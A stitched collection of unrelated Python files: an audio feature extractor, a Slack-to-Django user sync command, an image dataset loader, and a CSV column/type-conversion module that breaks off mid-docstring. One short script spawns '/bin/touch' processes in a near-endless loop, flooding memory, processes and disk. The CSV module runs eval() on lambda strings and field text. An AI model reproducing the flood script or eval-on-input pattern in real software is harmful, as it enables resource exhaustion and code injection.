if self.feature_layers[0] == 'fc':
Y = self.model.feature(self.targets[0], x)
feature['fc'] = np.concatenate(
[np.mean(Y, axis=0).ravel(),
np.std(Y, axis=0).ravel()]).ravel()
# other branching cases, need to extract each feature
else:
for target in self.targets:
Y = self.model.feature(target, x)
feature[target] = np.concatenate(
[np.mean(Y, axis=0).ravel(),
np.std(Y, axis=0).ravel()]).ravel()
for target in self.targets:
if target == 'self':
continue
mean_prob[target].append(
self.model.predict(target, x).mean(axis=0).ravel())
return feature, mean_prob
def _save_X(self, ix, fn):
""""""
for target in self.targets:
try:
feat, mean_prob = self._extract_feature(fn)
if self.feature_layers[0] == 'fc':
self.hf['X']['fc'][ix] = feat['fc']
else:
self.hf['X'][target][ix] = feat[target]
if target == 'self':
continue
if self.prob:
self.hf['Z'][target][ix] = mean_prob[target]
except Exception:
traceback.print_exc()
self.hf['X'][target][ix, :] = np.nan
print('[ERROR] file {} has problem!'.format(fn))
class MFCCExtractor(BaseExtractor):
""""""
def __init__(self, task, out_dir=None, hop_sz=1., n_mfcc=20):
""""""
super(MFCCExtractor, self).__init__(task, out_dir, hop_sz)
self.out_fn = os.path.join(
self.root, 'mfcc_{}_feature.h5'.format(self.task))
self.n_mfcc = n_mfcc
self.prob = False
self._prepare_db()
super(MFCCExtractor, self).post_init()
self.hf.attrs['targets'] = ['mfcc']
def _prepare_db(self):
""""""
n = len(self.db_info) # num obs
# m = self.n_mfcc * 3 * 2 # mfcc x (mfcc + d + dd) x (avg + std)
m = self.n_mfcc * 7 # mfcc * (avg, std, skew, kurt, median, min, max)
self.hf = h5py.File(self.out_fn, 'w')
self.hf.create_dataset('y', shape=(n, self.label_dim))
self.hf.create_group('X')
self.hf['X'].create_dataset('mfcc', shape=(n, m))
def _extract_feature(self, fn):
""""""
y, sr = librosa.load(fn, sr=22050, mono=True)
M = librosa.feature.mfcc(y, sr, n_mfcc=self.n_mfcc)
# dM = M[:, 1:] - M[:, :-1]
# ddM = dM[:, 1:] - dM[:, :-1]
# X = list(chain.from_iterable(
# map(lambda x:
# (x.mean(axis=1), x.std(axis=1)),
# [M, dM, ddM])
# ))
X = [
np.mean(M, axis=1),
np.std(M, axis=1),
stats.skew(M, axis=1),
stats.kurtosis(M, axis=1),
np.median(M, axis=1),
np.min(M, axis=1),
np.max(M, axis=1)
]
return np.concatenate(X)
def _save_X(self, ix, fn):
""""""
self.hf['X']['mfcc'][ix] = self._extract_feature(fn)
def main(task, feature, out_dir, hop_sz=1.):
"""
feature : {MTL_model_fn or 'mfcc'}
"""
if feature == 'mfcc':
Extractor = MFCCExtractor
else:
Extractor = partial(MTLExtractor, model_fn=feature)
if task.lower() == 'all': # do it all
for task_, info in DATASET_INFO.iteritems():
ext = Extractor(
task=task_,
hop_sz=hop_sz,
out_dir=out_dir
)
ext.process()
else: # individual tasks
ext = Extractor(
task=task,
hop_sz=hop_sz,
out_dir=out_dir
)
ext.process()
if __name__ == "__main__":
fire.Fire(main)
|
import subprocess
import os
import time
import random
import string
def randomString(stringLength=10):
"""Generate a random string of fixed length """
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
files = []
command = "/bin/touch"
processes = set()
max_processes = 100
i = 1;
while i < 9999999999999999999999999999999999:
rand = randomString(5);
print("Adding " + str(i) + "th " + rand);
files.append(rand);
i += 1;
for name in files:
processes.add(subprocess.Popen([command, name]))
if len(processes) >= max_processes:
os.wait()
processes.difference_update([
p for p in processes if p.poll() is not None]) |
import uuid
import requests
from django.contrib.auth.models import User
from django.core.files.base import ContentFile
from django.core.management.base import BaseCommand
from tqdm import tqdm
from slacker import Slacker
from staff.conf import settings
from staff.models import Profile
class Command(BaseCommand):
help = "Sync users from Slack"
def handle(self, *args, **options):
SLACK = Slacker(settings.SLACK_API_TOKEN)
slack_users = SLACK.users.list().body["members"]
for slack_user in tqdm(slack_users, desc="Users"):
id = slack_user["id"]
slack_profile = slack_user["profile"]
real_name = slack_profile.get("real_name", None)
display_name = slack_profile.get("display_name", None)
try:
first_name, last_name = real_name.split(" ", 1)
except ValueError:
try:
first_name, last_name = display_name.split(" ", 1)
except ValueError:
first_name = real_name or display_name or ""
last_name = ""
email = slack_profile.get("email", None)
if not email or email[-13:] != "@politico.com":
continue
user, created = User.objects.update_or_create(
username=email,
defaults={
"email": email,
"first_name": first_name,
"last_name": last_name,
"is_staff": True,
"is_active": slack_user["deleted"] is False,
},
)
profile, created = Profile.objects.update_or_create(
user=user,
defaults={
"slack_api_id": id,
"politico_title": slack_profile.get("title", "Staff"),
},
)
if (
slack_profile.get("image_192", False)
and not profile.slack_image
):
r = requests.get(slack_profile.get("image_192"), stream=True)
img = r.raw.read()
profile.slack_image.save(
"slack-profile-{}.jpg".format(uuid.uuid4().hex[:10]),
ContentFile(img),
save=True,
)
profile.save()
|
from torch.utils.data import Dataset
import pandas as pd
from skimage.io import imread
from skimage.transform import resize
from config.data_utils import all_classes
import pickle
def load_pickle(path):
with open(path,'rb') as handle:
return pickle.load(handle)
class data_loader_classifier(Dataset):
def __init__(self, path_to_csv, load_classes,path_to_img,path_to_pickle,test=False):
df=pd.read_csv(path_to_csv)
drop_classes=list(set(all_classes)-set(load_classes))
for cls in drop_classes:
df = df.drop(df[df.dx == cls].index)
self.imgs=df['image_id'].tolist()
self.cls=df['dx'].tolist()
self.path=path_to_img
if test:
norm_patients=load_pickle(path_to_pickle)
print(len(norm_patients))
self.imgs+=norm_patients
self.cls+=['norm']*len(norm_patients)
def get_image(self,path,img_cls):
img= imread(path)
if img_cls==7:
img=img[:img.shape[0]//4,:img.shape[1]//4,:]
rescaled_img=resize(img,(224,224,3),order=3)
return rescaled_img
def __getitem__(self, idx):
img_path=self.path+self.imgs[idx]+'.jpg'
img_cls=self.cls[idx]
img=self.get_image(img_path,img_cls)
return img, img_cls
def __len__(self):
return len(self.imgs)
|
#!/usr/bin/env python3
# Tools for data that can be represented as tables with row and columns.
"""
Tools for translating delimited text to and from Python typed values.
This module uses the Python csv package as the foundation for more
elaborate operations with CSV text. csv.reader.
The features added by this module are:
Readers and Writers that are aware of the column layout of the text.
Conversion of field (column) values from string to type on input
and from type to string on output.
Operators to modify the column layout of the text.
Control and verification of column headings in the first line of
text.
A 'Delim' class to support other forms of delimited text such as
tab-separated fields
The Column class supports input and output of the rows of a table that
is defined in text as rows and columns. Each row is delimited as fields
that correspond to columns of the table. The field values are strings
of text but can be of other types, such as int, when stored internally
by the application. Conversions between string values and typed internal
values is automatic.
Each column has a description consisting of four items:
Heading A string (which may be empty) for the heading
top of the column.
Input Function A lambda function that converts a string value
the value type stored by the application.
Output Function A lambda function that converts a value from the
type stored by to application to the string
representation required in the text
Column name A unique name, required for each column, that
meets the requirements for Python identifiers
and does not start or end with an underscore.
Except for the optional column headings, none of the column information
appears in the text. Instead, all of the information is held by the
application.
Input and output can be with or without column headings. Headings can
be verified on input, but are not verified on output. The options for
managing headings are identified from the enumeration Column.Policy:
Column.Policy.NO_HEADING: No headings
Column.HEADING_NO_CHECK: Headings, but no check
Column.HEADING_EASY_CHECK: Headings, check when input
Any sequence of whitespace is
equivalent to a single space.
Leading and trailing ignored.
Column.HEADING_EXACT_CHECK: Headings, check when input
Every character must match
The input readers are:
Column.ListInput Read each row as list of typed values
Column.DictInput Read each row as dictionary of typed values
Column.NamedInput Read each row as named tuple of typed values
The readers can be configured to accept short rows (missing fields
at the end) and will set the corresponding input values to None.
The output writers are:
Column.ListOutput Output list of typed values as a row
Column.DictOutput Output dictionary of typed values as a row
Column.NamedOutput Output named tuple of typed values as a row
The output writers require rows with a value for every column (no
short rows). Values can be set to None for any column with an
output function that accepts None.
The column operators, which create new instances, are:
append(columns) Append columns to the right
changeheadings(name_heading_pairs)
Change the headings of specified columns
rename(name_pairs) Change the names of specified columns
remove(names) Remove specified columns
select(names) Choose a subset of columns and specify order
Security
This module uses run-time compilation with eval() to support flexible
input, output, and type conversion. Consequently, this module should
only be used with code and data from trusted sources.
"""
# Python 3
import sys
import ast # support for using ast.literal_eval() in lambda functions
import collections
import csv
from enum import Enum
import keyword
import re
import types
class Column(object):
"""
Define format and type conversions for the input of formatted and
delimited text as a table of rows and columns of values, and for
output of a table as text fromatted into columns of rows and values.
A 'Column' object can be initialized with a list or tuple of column
descriptions. Each column desciption is a list or tuple of four
items:
[ heading (any text, or an empty string),
input function (lambda x: convert text to internal type),
output function (lambda x: convert internal type to text),
column name (nonblank)
]
The column name must be unique to each column, must start with a
letter, not end with an underscore, and contain only letters,
digits and underscores.
See the __init__ docstring for more info.
The 'Column' object has methods for selecting a subset of columns,
for obtaining column names and instance data as either lists, or
strings of delimited fields, for saving data to delimited files and
for loading data from delimited files.
A Column object, after initialization, is immutable. Changes to a
Column object will produce a new Column object.
"""
# Class data: regular expressions for column name generator
# One lowercase ASCII letter, followed by lowercase letters, digits,
# underscores, but with no underscore at either end.
_re_nowordchar = re.compile(r"[^a-zA-Z0-9_]+")
_re_space = re.compile(r"\s+")
_re_multiunder = re.compile(r"_{2,}")
_re_noleading = re.compile(r"^[_\d]+")
_re_notrailing = re.compile(r"_+$")
@classmethod
def createcolumnname(cls, text):
'''
Strip disallowed characters to produce a column name.
Creates a valid Python identifier that does not begin or end
with an underscore. text must contain at least one character
that becomes an ASCII letter when converted to lowercase.
'''
# Names will be used as item names in collections.namedtuple,
# so must not begin with underscores.
ident = cls._re_noleading.sub("",
cls._re_notrailing.sub("",
cls._re_multiunder.sub("_",
cls._re_nowordchar.sub("",
cls._re_space.sub("_",
text.lower())))))
if not cls.isvalidcolumnname(ident):
raise ValueError("Cannot convert to valid column name: "
+ repr(text))
if keyword.iskeyword(ident):
ident = ident + "_v"
return ident
# Class data: regular expressions for column name
# One ASCII letter, followed by letters, digits, underscores, but
# with no underscore at either end. Uppercase is OK.
_re_identifier = re.compile(r"[a-zA-Z_][a-zA-Z0-9_]*")
@classmethod
def isvalidcolumnname(cls, text):
"""
Indicate whether text is a valid column name.
A string is a valid column name if it begins with an ASCII
letter, continues with ASCII letters (lowercase or uppercase),
ASCII digits, and underscores, and it does not end with an
underscore.
"""
if text.startswith("_") or text.endswith("_"):
return False
return False if cls._re_identifier.fullmatch(text) is None else True
@classmethod
def eval_lambda_function(cls, func_str):
'''
Evaluate and validate a lambda expression.
\
func_str is a string that should evaluate as a lambda funcition.
'''
if not func_str.lstrip().startswith('lambda'):
raise ValueError(''.join(["Not a lambda expression: ",
repr(func_str)]))
try:
func = eval(func_str) # compile lambda function
if not isinstance(func, types.LambdaType):
raise TypeError("Not a function: " + repr(func_str))
except (SyntaxError, TypeError) as e:
# Failure to parse correctly will be caused by bad input.
raise ValueError(''.join(["Not valid source code for a Python",
" lambda function: ", repr(func_str)])
) from e
return func
# __class__._Policy - how headings should be managed. Easy check strips
# leading and trailing whiterspace, converts other sequences of whitespace
# to a single space character before comparing headings.
Policy = Enum("Policy", " ".join(["NO_HEADING",
"HEADING_NO_CHECK",
"HEADING_EASY_CHECK",
"HEADING_EXACT_CHECK"]))
def __init__(self, columns, headingpolicy=None):
"""
Create a Column instance from another object.
heading policy is one of:
None default (see beloe)
Column.Policy.NO_HEADING
Column.Policy.HEADING_NO_CHECK
Column.Policy.HEADING_EASY_CHECK
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more information
Parameter 'columns' is:
another instance of the class
default headingpolicy is column.Policy
or
an iterable (list, tuple, ) of quadruples of column heading,
input function (lambda), output function (lambda)
and column name (for use as a variable name)
default headingpolicy is Column.HEADING_EXACT_CHECK
The order of the columns will be the same as the order in the
other column instance or the order of the quadruples produced by
the iterable.
The input and output functions do any necessary type conversion
between the external string value and the internally stored
data.
Example of column properties for 4 columns to hold strings,
nullable strings, integers and lists:
[
# Heading
# Input Function
# Output Function
# Column name
[ "String",
"lambda x: str(x)",
"lambda x: '' if x is None else str(x)",
"string_v"],
[ "Nullable String",
"lambda x: None if x == '' else str(x)"",
"lambda x: '' if x is None else str(x)",
"nullable_string"],
[ "Integer",
"lambda x: None if x == '' else int(x)",
"lambda x: '' if x is None else str(x)",
"integer_v"],
[ "List",
"lambda x: None if x == '' else eval(x)",
"lambda x: '' if x is None else repr(x)",
"list_v"]
]
Column properties would be defined to suit the application. For
example, None and '' might be used to represent the absence of a
numeric value internally (None) and externally (empty string).
"""
super().__init__()
if headingpolicy and not isinstance(headingpolicy, __class__.Policy):
raise ValueError("Invalid heading policy: " + repr(headingpolicy))
# Create a subclass of NamedTuple for properties of each column
# when invoked as a function, behaves like a class object
self._ColProperty = collections.namedtuple("_ColProperty",
["infunc", "outfunc", "heading"])
# initialize from another instance or from an iterable of iterables
if isinstance(columns,type(self)):
# from another instance - make deep copy to avoid shared data
self._column = collections.OrderedDict(columns._column.items())
if headingpolicy:
self._headingpolicy = headingpolicy
else:
self._headingpolicy = columns._headingpolicy
else:
try:
self._column = self._columndictionary(columns)
except Exception as e:
raise RuntimeError(
"While initializing column definition") from e
if headingpolicy:
self._headingpolicy = headingpolicy
else:
self._headingpolicy = self.Policy.HEADING_EXACT_CHECK
# attributes with cached values
# Some of the operators create an instance with no column definitions
# and then add definitions. Attributes that depend on the column
# definitions must exist on first reference but cannot be set to final
# values until all of the column definitions exist.
self._NamedRow = None # returned by self.NamedRow()
def _columndictionary(self, initdata):
"""
Create column dictionary from an iterable of iterables of str.
The iterables must not themselves be type str.
As of 2019-05-10, the inner iterable produces four items:
Heading as text
input function as text for a lambda function
output function as text for a lambda function
column name as text
The corresponding dictionary entry is
columnname:[inputfunction, outputfunction, heading]
"""
if isinstance(initdata, str):
raise ValueError("Intializer is type str")
column_dictionary = collections.OrderedDict()
for init in initdata: # for each column
if isinstance(init, str):
raise ValueError("Column description is type str")
item = [j for j in init] # convert iterator or generator to list
# index errors would really be data errors
if len(item) < 4:
raise ValueError("Less than 4 items in column description: "
+ repr(item))
# item 0, column heading
column_heading = item[0]
# allow blank headings, treat missing as blank
if column_heading is None:
column_heading = ""
# items 1 and 2, input and output functions
infunc = self.eval_lambda_function(item[1])
outfunc = self.eval_lambda_function(item[2])
# item 3, column names
column_name = item[3]
if column_name in column_dictionary:
raise ValueError("Duplicate column name: " + column_name)
if not __class__.isvalidcolumnname(column_name):
raise ValueError("Invalid column name: " + column_name)
column_dictionary.setdefault(column_name,
self._ColProperty(infunc=infunc,
outfunc=outfunc,
heading=column_heading))
return column_dictionary
def __str__(self):
"""
Names of columns.
"""
return (__class__.__name__ + ".names=" + repr(self.names()))
def __len__(self):
"""
Number of columns.
"""
return len(self._column)
def _infunc(self, name):
return self._column[name].infunc
def _outfunc(self, name):
return self._column[name].outfunc
def _inputlocation(self, line_num):
"""
Report input location as line offset from beginning.
"""
return ''.join(["Input line ", str(line_num), ":"])
def _outputlocation(self, line_num):
"""
Report output location as line offset from beginning.
"""
return ''.join(["Output line ", str(line_num), ":"])
@property
def names(self):
"""
Column names as a list of strings.
"""
return [name for name in self._column.keys()]
def heading(self, name):
"""
Return the heading of the named column.
Heading may be an empty string. Two or more columns could have
the same heading.
"""
return self._column[name].heading
@property
def headingpolicy(self):
"""
One of the enumeration Column.Policy:
Policy.NO_HEADING No headings
Policy.HEADING_NO_CHECK Required headings
Policy.HEADING_EASY_CHECK Headings verified, any swqu3ence
of whitespace is equivalent
to ' '
Policy.HEADING_EXACT_CHECK Headings verified, exact match
"""
return self._headingpolicy
@property
def NamedRow(self): # returns a class object for creating instances
"""
NamedRow class object - creates named tuple of column values.
NamedRow is a subclass of collections.namedtuple. The item names
are the same as the column names, and are in the same order.
Usage:
NamedRow()
NamedRow(row)
NamedRow(name=value, ... )
If name=value pairs are given, all the column names must be
included.
If row is given, it must be an iterable producing the same
number of values as there are columns in the table.
If row is not given, the tuple will have the same number of
items as there are columns in the table. Each item will be set
to None.
"""
# create namedtuple subclass factory on first invocation, see __init__
if not self._NamedRow:
self._NamedRow = collections.namedtuple("NamedRow", self.names)
return self._NamedRow
def append(self, columns):
"""
Append the columns of a second instance to the right of the
columns in this instance (self).
Returns a new instance with the additional columns.
A new column must not have the same name as an original
column.
"""
new_instance = self.__class__(self)
for name in columns._column:
if name in self._column:
raise ValueError("Duplicate column name: " + repr(name))
new_instance._column.setdefault(name, columns._column[name])
return new_instance
def changeheadings(self, name_heading_pairs):
"""
Change the headings of selected columns in place.
Returns a new instance with the changed columns, all columns in
original order. Changes can be given in any order.
Parameter 'name_heading_pairs' is a list or other iterator of
string pairs:
("column_name", "new heading")
or
["column_name", "new heading"]
"""
# refuse strings because str is an iterable that we do not handle.
if isinstance(name_heading_pairs, str):
raise ValueError("Changes must be iterable of string pairs: "
+ repr(name_heading_pairs))
new_instance = self.__class__([])
change_dict = dict()
for (name, newhead) in name_heading_pairs:
if not name in self._column:
raise ValueError("Column name does not exist: " + repr(name))
if not isinstance(newhead, str):
raise ValueError("New heading must be str: " + repr(newhead))
change_dict.setdefault(name, newhead)
for (name, v) in self._column.items():
if name in change_dict:
new_instance._column.setdefault(name,
new_instance._ColProperty(
infunc=v.infunc,
outfunc=v.outfunc,
heading=change_dict[name]))
else:
new_instance._column.setdefault(name, v)
return new_instance
def remove(self, names):
"""
Remove a subset of columns.
Returns a new instance with the remaining columns.
Parameter 'names' is a list or other iterator of strings.
Each string must be an existing column name.
"""
if isinstance(names, str):
raise ValueError("names must be an iterator of string")
new_instance = self.__class__(self)
for name in names:
if not name in new_instance._column:
raise ValueError("Heading not present: " + repr(name))
del new_instance._column[name]
return new_instance
def rename(self, name_pairs):
"""
Change the names of selected columns in place.
Returns a new instance with the changed columns, all columns in
original order. Changes can be given in any order.
Parameter 'heading_name_pairs' is a list or other iterator of
string pairs:
("old_name", "new_name")
or
["old_name", "new_name"]
"old_name" must be the name of an existing column,
"new_name" must not duplicate a name to the left of the column
currently being renamed. New name must begin with a letter
continue with letters, digits and underscores, but must not end
with an underscore.
"""
# refuse strings because str is an iterable that we do not handle.
if isinstance(name_pairs, str):
raise ValueError("Changes must be iterable of string pairs: "
+ repr(name_pairs))
new_instance = self.__class__([])
name_dict = dict()
for (oldname, newname) in name_pairs:
if not oldname in self._column:
raise ValueError("Column does not exist: " + repr(oldname))
if not self.isvalidcolumnname(newname):
raise ValueError("New column name is invalid: "
+ repr(newname))
name_dict.setdefault(oldname,newname)
for name in self.names:
if name in name_dict:
newname = name_dict[name]
else:
newname = name
if newname in new_instance._column:
raise ValueError("Duplicate new column name: " + repr(newname))
new_instance._column.setdefault(newname, self._column[name])
return new_instance
def select(self, names):
"""
Create a subset (or a full copy) of columns.
Returns a new instance with the selected columns, in the
same order as the specified names.
Parameter 'names' is a list or other iterator of strings.
Each string must be the name of an existing column and must
appear only once.
"""
if isinstance(names, str):
raise ValueError("names must be an iterator of string")
for name in names:
if not name in self._column:
raise ValueError("Column does not exist: " + repr(name))
new_instance = self.__class__([])
for name in names:
if name in new_instance._column:
raise ValueError("Duplicate name: " + repr(name))
new_instance._column.setdefault(name, self._column[name])
return new_instance
def ListInput(self, rowreader, shortrowsallowed=False, headingpolicy=None):
"""
Create reader instance to input lists of typed values.
Each list will contain itesm in the same order as the columns,
one item for each column. Each item will have the type (like
str or int) that is required for use within the application,
rowreader is an iterable (like csv.reader) that produces an
iterable of strings from each line of text input to the
rowreader
shortrowsallowed specifies whether a row can be shorter than
the number of columns. Missing values are set to None to
produce a row of full length.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, input will commence when the
first data list is requested. Otherwise, the column headings
will be read immediately. If the headings are checked and fail
verification, an exception will be raised immediately.
Otherwise, input will continue when the first data dictionary is
requested.
Usage:
reader = ListInput(rowreader, shortrowsallowed, headingpolicy)
for datalist in reader:
do_something(datalist)
datalist = next(reader)
do_something(datalist)
The number of input lines read (including any headings) will be
available at any time during the life of the reader:
input_lines = reader.line_num
The column headings will be available at any time during the
life of the reader:
input_headings = reader.headingrow
When headingpolicy is NO_HEADING, the headings will be None.
Otherwise, the column headings will be as read from the input,
whether or not those headings match the headings defined for
each column.
"""
return self.__class__._ListInput(self, rowreader, shortrowsallowed,
headingpolicy)
class _ListInput(object):
"""
Reader to input lists of typed values from lists of strings.
"""
def __init__(self, column, rowreader, shortrowsallowed, headingpolicy):
self._headings = [column.heading(name) for name in column.names]
self._infunc = [column._infunc(name) for name in column.names]
self._inputlocation = column._inputlocation
self._rowreader = rowreader
self._re_whitespace = re.compile(r"\s+")
self._line_num = 0
if headingpolicy == None:
self._headingpolicy = column.headingpolicy
else:
if isinstance(headingpolicy, column.Policy):
self._headingpolicy = headingpolicy
else:
raise ValueError("Invalid heading policy: "
+ repr(headingpolicy))
if self._headingpolicy == column.Policy.NO_HEADING:
# finished, first row should be data
self._headingrow = None
return
try:
row = next(self._rowreader)
# It is OK to have no heading when input is empty, but
# any text from first line of input should be headings.
# convert iterable or generator to tuple for multiple use
self._headingrow = tuple(r for r in row)
if self._headingpolicy == column.Policy.HEADING_NO_CHECK:
# first row is headings, but no check required
pass
elif (self._headingpolicy == column.Policy.HEADING_EASY_CHECK
and (self._compressedtuple(h for h in self._headings)
== self._compressedtuple(self._headingrow))):
# first row is headings that match except for whitespace
pass
elif (self._headingpolicy == column.Policy.HEADING_EXACT_CHECK
and (tuple(h for h in self._headings)
== tuple(self._headingrow))):
# first row is headings that match including whitespace
pass
else:
# failed either becuase heading is not correct or because
# headingpolicy is a value that was not included in test
raise ValueError(''.join([
self._inputlocation(self._line_num),
" Error reading headings\nExpected ",
repr([h for h in self._headings]),
"\nReceived ", repr([r for r
in self._headingrow]),
"Heading Policy: ", repr(headingpolicy)])
)
# headings OK, ready for next line which should be data
self._line_num += 1
except StopIteration:
# Defer any action until the attempt to read first row of
# data (second line of text) raises another StopIteration.
pass
def _compresswhitespace(self, text):
"""
Remove extra whitespace from a single string.
Replace all sequences of whitespace by single space, remove
leading and trailing spaces.
"""
return self._re_whitespace.sub(' ', text).strip()
def _compressedtuple(self, items):
"""
Remove extra whitespace from each string in an
iterable of strings, return the results as a tuple.
Replace all sequences of whitespace by single space, remove
leading and trailing spaces.
"""
return tuple(self._compresswhitespace(j) for j in items)
@property
def line_num(self):
"""
This is the number of rows of text that have been read.
It is also the number of the next row waiting to be read,
counting from line 0 as the first line. The count includes
the heading row if there is one, even though the heading row
is not returned.
In CSV text with multiline values, the row coun may be less
than the line count.
"""
return self._line_num
@property
def headingrow(self):
'''
Return headings as read from input.
Returns None if no headings (whenfirst row is data or input is
empty).
The headings may not be the same as the headings in the column
definition/
'''
return self._headingrow
def __iter__(self):
return self
def __next__(self):
"""
Return a line as a list of typed values.
"""
rowvalues = None
try:
row = next(self._rowreader)
data = [r for r in row] # convert iterator or generator to list
if len(data) < len(self._headings):
if self._shortrowsallowed:
for n in range(len(data), len(self._headings)):
data[n] = None
else:
raise ValueError("Expected " + len(self._headings)
+ " items, got " + len(row))
# Convert string values to typed internal values.
rowvalues = [f(d) for f, d in zip(self._infunc, data)]
self._line_num += 1
except SyntaxError as e:
# Syntax error: eval() or ast.literal_eval() from within
# self._infunc(), will be caused by an input string that does
# not parse as a valid Python expression.
raise ValueError(
''.join([self._inputlocation(self._line_num),
" unable to parse incoming text as a Python",
" expression"])
) from e
except Exception as e:
# Any other error can be forwarded with some additional info.
raise RuntimeError(self._inputlocation(self._line_num)
+ " Error reading data."
) from e
return rowvalues
def ListOutput(self, rowwriter, headingpolicy=None):
"""
Create writer instance to output list (or other iterable) of
typed values.
Each list or iterable must have an item for each column, as many
items as there are columns. The items are anononymous, but each
item must be of the type expected by the corresponding column.
Upon output, each item will be converted from the type used by
the application to a string of text.
rowwriter is an object (like cvs.writer) with a writerow method
that accepts an iterator of strings.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, output will commence with the
first data list. Otherwise, the column headings will be written
immediately and output will continue with the first data list.
Usage:
writer = ListOutput(rowreader, headingpolicy)
for datalist in iterable:
writer.write(datalist)
writer.writerows(iterable_of_datalist)
"""
return self.__class__._ListOutput(self, rowwriter, headingpolicy)
class _ListOutput(object):
def __init__(self, column, rowwriter, headingpolicy=None):
self._headings = [column.heading(name) for name in column.names]
self._outfunc = [column._outfunc(name) for name in column.names]
self._outputlocation = column._outputlocation
self._rowwriter = rowwriter
self._line_num = 0 # not intended for external use
# headings not checked on output, so the checked write
# options have the same effect as unchecked write option.
if headingpolicy != column.Policy.NO_HEADING:
try:
self._rowwriter.writerow(self._headings)
self._line_num += 1
except Exception as e:
raise RuntimeError(''.join([
self._outputlocation(self._line_num),
" Error writing column headings."])
) from e
def writerow(self, row):
"""
Write list of values to output, converting to string
as necessary.
"""
try:
# convert iterator or generator to a reusable list, reject str
if isinstance(row, str):
raise ValueError(''.join(["Row data must be list, tuple",
" or other iterable, but not str"]))
data = [r for r in row] # convert iterator or generator to list
if len(data) != len(self._headings):
raise ValueError("Expected " + len(self.headings)
+ " items, got " + len(data))
self._rowwriter.writerow(
[f(d) for (f, d) in zip(self._outfunc, data)])
self._line_num += 1
except Exception as e:
raise RuntimeError(''.join([
self._outputlocation(self._line_num),
" Error writing data."])
) from e
def writerows(self, data):
"""
Output zero or more lists of values as rows of text.
"""
for row in data:
self.writerow(row)
def DictInput(self, rowreader, shortrowsallowed=False, headingpolicy=None):
"""
Create reader instance to input ordered dictionaries of typed
values.
The keys of the items in each dictionary will be the same as the
names of the columns and the items will be in the same order as
the columns. Each item will have the type (like str or int)
that is required for use within the application,
rowreader is an iterable (like csv.reader) that produces an
iterable of strings from each line of text input to the
rowreader
shortrowsallowed specifies whether a row can be shorter than
the number of columns. Missing values are set to None to
produce a row of full length.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, input will commence when the
first data dictionary is requested. Otherwise, the column
headings will be read immediately. If the headings are checked
and fail verification, an exception will be raised immediately.
Otherwise, input will continue when the first data dictionary is
requested.
Usage:
reader = DictInput(rowreader, shortrowsallowed, headingpolicy)
for dictionary in reader:
do_something(dictionary)
dictionary = next(reader)
do_something(dictionary)
The number of input lines read (including any headings) will be
available at any time during the life of the reader:
input_lines = reader.line_num
The column headings will be available at any time during the
life of the reader:
input_headings = reader.headingrow
When headingpolicy is NO_HEADING, the headings will be None.
Otherwise, the column headings will be as read from the input,
whether or not those headings match the headings defined for
each column.
"""
return self.__class__._DictInput(self, rowreader, shortrowsallowed,
headingpolicy)
class _DictInput(object):
def __init__(self, column, rowreader, shortrowsallowed, headingpolicy):
self._names = column.names
self._inputlocation = column._inputlocation
self._listinput = column.ListInput(rowreader, shortrowsallowed,
headingpolicy)
# ListInput will discard headings, so we get line count from
# ListInput instance instead of counting lines in this instance.
self._line_num = self._listinput.line_num
@property
def line_num(self):
"""
This is the number of lines that have been read.
"""
return self._line_num
@property
def headingrow(self):
'''
Return headings as read from input.
Returns None if no headings (whenfirst row is data or input is
empty).
The headings may not be the same as the headings in the column
definition/
'''
return self._listinput.headingrow
def __iter__(self):
return self
def __next__(self):
"""
Return a line as an ordered dictionary of typed values.
"""
row = next(self._listinput) # get row and check length
data = (collections.OrderedDict([(h, r) for h, r
in zip(self._names, row)]))
self._line_num = self._listinput.line_num
return data
def DictOutput(self, rowwriter, headingpolicy=None):
"""
Create writer instance to output dictionaries of typed values.
Each dictionary must have a keyed item for each column. The
key of each item must be the same as the column name of the
corresponding column. Upon output, each item will be converted
from the type used by the application to a string of text.
rowwriter is an object (like cvs.writer) with a writerow method
that accepts an iterator of strings.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, output will commence with the
first data dictionary. Otherwise, the column headings will be
written immediately and output will continue with the first
data dictionary.
Usage:
writer = DictOutput(rowreader, headingpolicy)
for dictionary in iterable:
writer.write(dictionary)
writer.writerows(iterable_of_dictionary)
"""
return self.__class__._DictOutput(self, rowwriter, headingpolicy)
class _DictOutput(object):
def __init__(self, column, rowwriter, hasheadings):
self._names = column.names
self._outputlocation = column._outputlocation
self._listoutput = column.ListOutput(rowwriter, hasheadings)
# ListOutput will write headings, so we get line count from
# ListOutput instance instead of counting lines in this instance.
self._line_num = self._listoutput._line_num
def writerow(self, dictionary):
"""
Write the values for each key of the dictionary to the
corresponding named columns, converting internal values to
strings as necessary.
"""
try:
self._listoutput.writerow(
dictionary[name] for name in self._names)
self._line_num = self._listoutput._line_num
except KeyError as e:
raise ValueError(''.join(
[self._outputlocation(self._line_num),
" dictionary is missing values for one or",
" more columns of output.",
"\nColumn names:\n",
repr(self._names),
"\nDictionary names:\n",
repr(dictionary.keys())
])
) from e
def writerows(self, dictionaryiterator):
"""
Write the values for each key of each dictionary to the
corresponding named columns, converting internal values to
strings as necessary.
"""
for dictionary in dictionaryiterator:
self.writerow(dictionary)
def NamedInput(self, rowreader, shortrowsallowed=False,
headingpolicy=None):
"""
Create a reader instance to input namedtuples of typed values.
The names of the items in each namedtuple will be the same as
names of the columns and the items will be in the same order as
the columns. Each item will have the type (like str or int)
that is required for use within the application,
rowreader is an iterable (like csv.reader) that produces an
iterable of strings from each line of text input to the
rowreader
shortrowsallowed specifies whether a row can be shorter than
